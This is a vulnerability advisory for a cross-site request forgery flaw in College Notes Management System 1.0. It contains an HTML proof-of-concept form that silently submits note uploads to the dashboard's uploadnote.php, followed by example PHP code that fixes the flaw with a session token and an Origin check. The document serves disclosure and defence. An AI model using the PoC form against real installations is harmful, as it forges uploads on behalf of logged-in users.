College Notes Management System 1.0 Cross Site Request Forgery

2019.08.04
Credit: Mr Winst0n
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: College Notes Management System 1.0 - CSRF (Add Note)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan@gmail.com
# Discovery Date: August 3, 2019
# Vendor Homepage: https://anirbandutta.ml/
# Software Link: https://sourceforge.net/projects/college-notes-management/
# Software Link: https://github.com/anirbandutta9/College-Notes-Gallery
# Tested Version: 1.0
# Tested on: Parrot OS

# PoC:

<form role="form" action="http://localhost/[PATH]/dashboard/uploadnote.php" method="POST" enctype="multipart/form-data">
  <div class="form-group">
    <label for="post_title">Note Title</label>
    <input type="text" name="title" class="form-control" placeholder="Eg: Php Tutorial File" value="" required="">
  </div>
  <div class="form-group">
    <label for="post_tags">Short Note Description</label>
    <input type="text" name="description" class="form-control" placeholder="Eg: Php Tutorial File includes basic php programming ...." value="" required="">
  </div>
  <div class="form-group">
    <label for="post_image">Select File</label><font color="brown"> (allowed file type: 'pdf','doc','ppt','txt','zip' | allowed maximum size: 30 mb ) </font>
    <input type="file" name="file">
  </div>
  <button type="submit" name="upload" class="btn btn-primary" value="Upload Note">Upload Note</button><br><br>
</form>
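The root cause (CWE-352) is that uploadnote.php accepts the POST above with no per-session secret bound to the form. The following is an added example of the synchronizer-token fix for a PHP handler shaped like that page: the field names title, description, file and upload come from the PoC, while the helper names, the hidden csrf_token field and the Origin check are assumptions of this example, not the project's own code.

```php
<?php
// Added example (not project code): synchronizer-token CSRF protection
// for an upload handler with the same fields as uploadnote.php.
session_start();

// One random token per session, created on first use and reused afterwards.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token with the session copy.
function csrf_valid(?string $submitted): bool {
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// Defence in depth: if the browser sent an Origin header, it must be ours.
// A missing header is tolerated because the token is the primary control.
function origin_valid(): bool {
    if (!isset($_SERVER['HTTP_ORIGIN'])) {
        return true;
    }
    $host = parse_url($_SERVER['HTTP_ORIGIN'], PHP_URL_HOST);
    return is_string($host) && $host === ($_SERVER['SERVER_NAME'] ?? '');
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['upload'])) {
    if (!csrf_valid($_POST['csrf_token'] ?? null) || !origin_valid()) {
        http_response_code(403);
        exit('Rejected: missing or invalid anti-CSRF token.');
    }
    // Only now validate $_POST['title'], $_POST['description'] and
    // $_FILES['file'] (type and size) and store the note.
}
?>
<form action="uploadnote.php" method="POST" enctype="multipart/form-data">
  <!-- The hidden token is what a cross-site form cannot supply. -->
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
  <input type="text" name="title" required>
  <input type="text" name="description" required>
  <input type="file" name="file">
  <button type="submit" name="upload" value="Upload Note">Upload Note</button>
</form>
```

A request built from the PoC form above carries no csrf_token field, so csrf_valid() returns false and the handler answers 403 before touching the upload.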


Copyright 2019, cxsecurity.com